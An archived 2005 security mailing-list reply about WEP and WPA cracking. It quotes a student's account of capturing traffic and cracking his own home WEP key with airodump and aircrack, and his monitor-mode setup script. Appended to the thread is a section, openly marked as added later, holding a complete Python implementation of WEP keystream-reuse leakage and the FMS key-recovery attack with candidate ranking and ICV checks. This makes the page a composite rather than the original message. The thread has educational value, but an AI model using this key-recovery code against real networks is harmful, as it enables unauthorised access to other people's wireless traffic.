Re: Cracking WEP and WPA keys

From: Robin Wood (dninja@gmail.com)
Date: Tue Dec 13 2005 - 12:18:05 EST


Can you remember how many packets you captured for the 10 second crack?

I was running with 1 million generated using aireplay of a captured packet.

Robin

On 12/13/05, Dave Bush <hockeystatman@gmail.com> wrote:
> On 12/13/05, Robin Wood <dninja@gmail.com> wrote:
> > All the examples I've seen seem to suggest that cracking should take minutes
> > not hours and all keys should be crackable. What experiences do other
> > testers have? Have I done something wrong? I abandoned the full attack after
> > 5 hours as it was running with the default fudge factor of 2 so would
> > probably not have managed to crack the key.
>
> I don't think you captured enough data.
>
> I just finished NS621 - Applied Wireless Network Security at Capitol
> College as one of the final classes in my Masters in Network Security
> (as of tomorrow evening my Masters is complete!), and lab 5 for 621
> was cracking WEP. The long and the short of cracking WEP was making
> sure you captured enough data to get the key.
>
> When I did the WEP cracking lab I had my wife's laptop start copying 6
> GB of video files from a Linux server in my house so that IV
> collisions would happen more frequently than if just Internet surfing
> was going on. FWIW Her notebook was running Windows XP SP2 and an
> 802.11G PCMCIA card, and the Linux server was running Samba to talk to
> my wife's notebook & connected to the home WLAN using a USB 802.11B
> dongle. I then had my notebook running airodump in Windows (worked
> fine in Linux too) and just let it do its thing for an hour or so. At
> that point I guessed that it'd probably captured enough so I ran
> aircrack against the file airodump created, and it cracked my home WEP
> key in about 10 seconds. No exaggeration - 10 seconds!
>
> It's important to note that I did not stop running airodump while
> running aircrack on the file. That way if I'd had to capture more IV
> collisions to be able to crack WEP, I could just try it again later.
>
> Running aircrack in Linux yielded similar results to running it in
> Windows as far as performance goes. (ie: 10 seconds in Linux too)
>
> I've never gotten Air Snort to work in either Windows or Linux. I'm
> running the drivers from Wild Packets in Windows, and everything I've
> read says it should work on my Atheros based chipset wireless card but
> my results are obviously different. Running Air Snort in Linux will
> capture data, but after leaving it going overnight it never did crack
> WEP. This was while performing the same 6 GB copy from the Linux
> server to my wife's notebook, so I know enough IV collisions should
> have been captured.
>
> I also tried using aircrack against the tcpdump files that Kismet
> kicked out after letting Kismet run for hours, and that didn't work
> either.
>
> NOTE: You have to be careful how you set your card in Linux to get it
> to work right with airodump or most any other wireless tool. Here's
> the script I use to configure my Atheros card for stuff like this:
>
> #!/bin/bash
> #
> # -----------------------------------------------------
> # ! This script written by Dave Bush for use in       !
> # ! Capitol College's NS621-L01 Fall 2005 class       !
> # !                                                   !
> # ! This works well for me, and hopefully can be      !
> # ! used as a starting point for others exploring     !
> # ! wireless tools in Linux. I've used this for       !
> # ! setting up wireless for both Kismet and AirSnort. !
> # !                                                   !
> # ! Please direct any questions to me at              !
> # ! hockeystatman@gmail.com                           !
> # -----------------------------------------------------
> #
> # Set card to 802.11b mode (madwifi: mode 2 = 802.11b)
> #
> iwpriv ath0 mode 2
> #
> # Set the speed for 802.11b
> #
> iwconfig ath0 rate 11M
> #
> # Set authentication mode to open system (madwifi: authmode 1);
> # the interface name is required or iwpriv does nothing
> #
> iwpriv ath0 authmode 1
> #
> # Clear any WEP key that has been set
> #
> iwconfig ath0 key off
> #
> # Clear any SSID that has been set
> #
> iwconfig ath0 essid any
> #
> # Set card into monitor mode
> #
> iwconfig ath0 mode monitor
> #
> # -----------------------------------------------------
> # ! The wireless card should now be ready for use by  !
> # ! Kismet, AirSnort, and other Linux-based wireless  !
> # ! auditing tools.                                   !
> # -----------------------------------------------------
>
> Long story short - airodump and aircrack worked fine for me once my
> card was correctly configured, but nothing else I've done has worked.
>
> > I've also seen a video on the Remote Exploit site showing a WPA key cracked
> > in 10 minutes using cowpatty and a dictionary attack. How realistic is this?
>
> Not sure, but I'm guessing it was WPA with a pre-shared key. Can you
> send a link to the video?
>
> Regards,
> - Dave
> --
> Dave Bush <hockeystatman@gmail.com>
>
> There are two seasons in my world - Hockey and Construction
>
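A worked example added here to make the "enough IVs" point in the thread concrete. It is not code from this thread and not aircrack's code; it is a constructed model of WEP (RC4 keyed with IV||key, CRC-32 ICV appended little-endian, first plaintext byte 0xAA from the SNAP header) with a made-up 40-bit key, made-up frame contents and a made-up capture. It shows the two things the replies above are circling: a frame pair that reuses an IV leaks the XOR of the two plaintexts, and the FMS attack aircrack runs recovers the key one byte at a time by voting over "resolved" IVs, where each such IV names the right byte only about 5% of the time, so hundreds of them per key byte are needed before the right value stands out. The ranked search with a fudge factor is a simplified stand-in for what aircrack's -f option controls: candidates with fewer than best/fudge votes are not tried, and each full candidate key is confirmed by checking the ICV. The capture is stacked with only the 256 classic weak IVs (A+3, 255, X) per key byte; in a real capture those are a tiny fraction of the 2^24 IV space, which is why a few thousand frames go nowhere and a million replayed packets can suffice.

```python
"""Constructed WEP/FMS demo: keystream reuse and key-byte voting (not aircrack code)."""
import zlib

SNAP_FIRST_BYTE = 0xAA  # LLC DSAP: the first plaintext byte of every WEP data frame


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, payload: bytes) -> tuple:
    """(iv, body) as a station sends it: RC4(IV || key) over payload || CRC-32 ICV."""
    plain = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4(iv + secret, len(plain))
    return iv, bytes(p ^ k for p, k in zip(plain, ks))


def icv_ok(secret: bytes, iv: bytes, body: bytes) -> bool:
    """Decrypt with a candidate key and check the ICV; this is how a key guess is confirmed."""
    ks = rc4(iv + secret, len(body))
    plain = bytes(c ^ k for c, k in zip(body, ks))
    return zlib.crc32(plain[:-4]) == int.from_bytes(plain[-4:], "little")


def reuse_leak(body_a: bytes, body_b: bytes, known_a: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C_a ^ C_b ^ P_a = P_b."""
    return bytes(a ^ b ^ p for a, b, p in zip(body_a, body_b, known_a))


def fms_votes(frames, prefix: bytes) -> list:
    """Vote for secret byte A = len(prefix), using the IV and the A bytes already recovered."""
    A = len(prefix)
    votes = [0] * 256
    for iv, body in frames:
        K = iv + prefix                       # K[0..A+2] is fully known
        S = list(range(256))
        j = 0
        for i in range(A + 3):                # replay the first A+3 key-scheduling steps
            j = (j + S[i] + K[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        s1 = S[1]
        if s1 >= A + 3 or (s1 + S[s1]) & 0xFF != A + 3:
            continue                          # not a "resolved" IV for this byte
        out = body[0] ^ SNAP_FIRST_BYTE       # first keystream byte is known
        # with ~5% probability out == S[j_next], and j_next = j + S[A+3] + K[A+3]
        votes[(S.index(out) - j - S[A + 3]) & 0xFF] += 1
    return votes


def crack(frames, key_len: int, fudge: int = 2, max_branch: int = 4):
    """Depth-first search over ranked byte candidates, confirmed by the ICV of two frames."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if all(icv_ok(prefix, iv, b) for iv, b in frames[:2]) else None
        votes = fms_votes(frames, prefix)
        ranked = sorted(range(256), key=lambda b: -votes[b])[:max_branch]
        best = votes[ranked[0]]
        for b in ranked:
            if votes[b] * fudge < best:       # fewer than best/fudge votes: skip it
                break
            found = search(prefix + bytes([b]))
            if found is not None:
                return found
        return None
    return search(b"")


# Constructed capture: a made-up 40-bit key and frames whose IVs are the weak (A+3,255,X) family.
SECRET = bytes.fromhex("0a1b2c3d4e")
PAYLOAD = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed frame"
CAPTURE = [wep_encrypt(SECRET, bytes([a + 3, 255, x]), PAYLOAD)
           for a in range(len(SECRET)) for x in range(256)]
# Constructed IV-reuse pair: same IV, two different payloads of the same length.
SAME_IV = bytes([0x12, 0x34, 0x56])
FRAME_A = wep_encrypt(SECRET, SAME_IV, PAYLOAD)
FRAME_B = wep_encrypt(SECRET, SAME_IV, PAYLOAD[:8] + b"second secret msg")

if __name__ == "__main__":
    print("leaked from IV reuse:", reuse_leak(FRAME_A[1], FRAME_B[1], PAYLOAD))
    print("recovered key:", crack(CAPTURE, len(SECRET)).hex())
```

Drop the weak IVs out of CAPTURE (or keep only a handful per byte) and crack() starts returning None or needs a larger fudge, which is the same effect Robin saw with too small a capture. A 104-bit key simply needs eight more rounds of the same vote, not a different attack.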

------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:

Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
futile against web application hacking. Check your website for vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:16 EDT